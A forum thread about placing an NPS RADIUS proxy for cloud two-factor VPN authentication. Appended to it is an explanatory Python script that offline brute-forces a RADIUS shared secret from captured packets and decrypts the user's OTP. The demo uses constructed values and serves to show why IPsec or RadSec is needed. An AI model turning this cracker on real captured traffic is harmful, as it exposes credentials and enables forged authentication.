NPS in DMZ or internal network

  • Question

  • Hi,

      We have a cloud-based authentication service provider for two-factor authentication. For VPN connectivity, the client machine connects to the VPN gateway in the corporate DMZ, and the VPN gateway contacts the cloud authentication provider to verify the one-time password. The VPN gateway-to-cloud communication happens over RADIUS across the Internet. Considering the security issues in RADIUS, the plan is to have a RADIUS server hosted on-premises which in turn may connect to the cloud for authentication. Should we have the NPS server installed in the DMZ or the internal network? The NPS will not authenticate users against AD but connects to the cloud provider to validate the OTP. What is recommended in this case? NPS (RADIUS server) in the DMZ or NPS in the internal network?

    Wednesday, July 2, 2014 1:45 AM


  • Hi,

    I think what Alex is saying is that there can only be one authentication for each type of network access request. You indicated a two-factor authentication, but what is actually happening is that the VPN server is a pass-through (a.k.a. proxy). No authentication is occurring there. You can add another pass-through, with a second proxy RADIUS (VPN also runs RADIUS), but I don't think this will accomplish very much in terms of improved security. The authentication will still all occur in the cloud, and the other RADIUS server will just be forwarding the authentication request the same as the VPN server. Please correct me if I'm mistaken, but if someone can access unencrypted network traffic on the VPN server, it doesn't matter if packets are being sent into your network or out to the cloud.

    It is quite common to place a pass-through/proxy VPN like this in the DMZ. If this VPN server must be accessible from the Internet, you can't place it anywhere else from a logical network perspective. Even though you might use PAT or NAT to physically place the server on your LAN, there will still be public access via the translated port address.

    I'm sure you know that you have chosen a less secure authentication method (PAP, CHAP) instead of something more secure like PEAP. Assuming you cannot change this, you might consider using an IPsec tunnel between the VPN server and the NPS/Cloud.

    I hope this helps,


    • Marked as answer by Alex Lv Thursday, August 7, 2014 10:24 AM
    Sunday, July 6, 2014 6:08 PM
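To make the "security issues in RADIUS" concrete, here is an added example (not code from anyone in this thread). It implements the RFC 2865 wire format for a PAP Access-Request and Access-Accept, then plays the role of a passive observer on the Internet leg: with one captured request/response pair and a wordlist, it brute-forces the shared secret by recomputing the Response Authenticator (MD5 over the packet plus the secret) and then peels the MD5-keystream "encryption" off the User-Password attribute. The secret, user name and OTP value are constructed for the demo; the Message-Authenticator attribute (RFC 2869) is omitted, so this is the bare RFC 2865 behaviour.

```python
"""RADIUS (RFC 2865) PAP exchange and the offline shared-secret attack a
passive observer can run against it. Constructed example; no real traffic."""
import hashlib
import os
import struct

ACCESS_REQUEST = 1
ACCESS_ACCEPT = 2
ATTR_USER_NAME = 1
ATTR_USER_PASSWORD = 2


def attr(attr_type, value):
    """Type-Length-Value; Length counts the two header octets too."""
    return bytes([attr_type, len(value) + 2]) + value


def encrypt_password(password, secret, request_auth):
    """RFC 2865 5.2: pad to 16-octet blocks, XOR block i with
    MD5(secret + previous ciphertext block); block 0 uses the Request
    Authenticator. Knowing the secret therefore reverses it completely."""
    p = password.encode()
    p += b"\x00" * ((-len(p)) % 16 or (16 if not p else 0))
    out, prev = b"", request_auth
    for i in range(0, len(p), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = bytes(x ^ y for x, y in zip(p[i:i + 16], keystream))
        out += block
        prev = block
    return out


def decrypt_password(ciphertext, secret, request_auth):
    out, prev = b"", request_auth
    for i in range(0, len(ciphertext), 16):
        keystream = hashlib.md5(secret + prev).digest()
        block = ciphertext[i:i + 16]
        out += bytes(x ^ y for x, y in zip(block, keystream))
        prev = block
    return out.rstrip(b"\x00").decode()


def build_packet(code, ident, authenticator, attrs):
    return struct.pack("!BBH", code, ident, 20 + len(attrs)) + authenticator + attrs


def response_authenticator(code, ident, request_auth, attrs, secret):
    """RFC 2865 3: MD5(Code + ID + Length + RequestAuth + Attributes + Secret).
    Only the trailing secret is unknown to an observer, so it is guessable."""
    header = struct.pack("!BBH", code, ident, 20 + len(attrs))
    return hashlib.md5(header + request_auth + attrs + secret).digest()


def access_request(ident, username, password, secret, request_auth):
    attrs = attr(ATTR_USER_NAME, username.encode())
    attrs += attr(ATTR_USER_PASSWORD, encrypt_password(password, secret, request_auth))
    return build_packet(ACCESS_REQUEST, ident, request_auth, attrs)


def access_accept(request_pkt, secret, attrs=b""):
    _, ident, _ = struct.unpack("!BBH", request_pkt[:4])
    request_auth = request_pkt[4:20]
    resp_auth = response_authenticator(ACCESS_ACCEPT, ident, request_auth, attrs, secret)
    return build_packet(ACCESS_ACCEPT, ident, resp_auth, attrs)


def parse(pkt):
    code, ident, length = struct.unpack("!BBH", pkt[:4])
    attrs, pos = {}, 20
    while pos < length:
        attr_type, attr_len = pkt[pos], pkt[pos + 1]
        attrs[attr_type] = pkt[pos + 2:pos + attr_len]
        pos += attr_len
    return code, ident, pkt[4:20], attrs


def crack_secret(request_pkt, response_pkt, wordlist):
    """Offline: recompute the Response Authenticator for each candidate secret
    until it matches the one seen on the wire. Nothing is sent to anyone."""
    _, ident, request_auth, _ = parse(request_pkt)
    code, _, resp_auth, _ = parse(response_pkt)
    for candidate in wordlist:
        if response_authenticator(code, ident, request_auth, response_pkt[20:], candidate) == resp_auth:
            return candidate
    return None


def demo():
    secret = b"radius2014"            # constructed weak shared secret
    request_auth = os.urandom(16)     # the NAS picks this per request
    req = access_request(7, "alice", "123456", secret, request_auth)   # constructed OTP
    resp = access_accept(req, secret)
    wordlist = [b"password", b"secret", b"radius", b"radius2014", b"changeme"]
    recovered = crack_secret(req, resp, wordlist)
    otp = None
    if recovered is not None:
        otp = decrypt_password(parse(req)[3][ATTR_USER_PASSWORD], recovered, request_auth)
    return recovered, otp


if __name__ == "__main__":
    print(demo())
```

The point for this thread: adding an on-premises proxy in front of the same RADIUS-over-Internet leg changes nothing for this observer, because the packets the observer needs still cross the Internet unchanged. Recovering the secret is worse than recovering one OTP: with the secret, the observer can forge an Access-Accept for any request it sees, which is why the IPsec tunnel suggested above (or RadSec/RADIUS over TLS, if the cloud provider offers it) is the fix, not a second hop.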
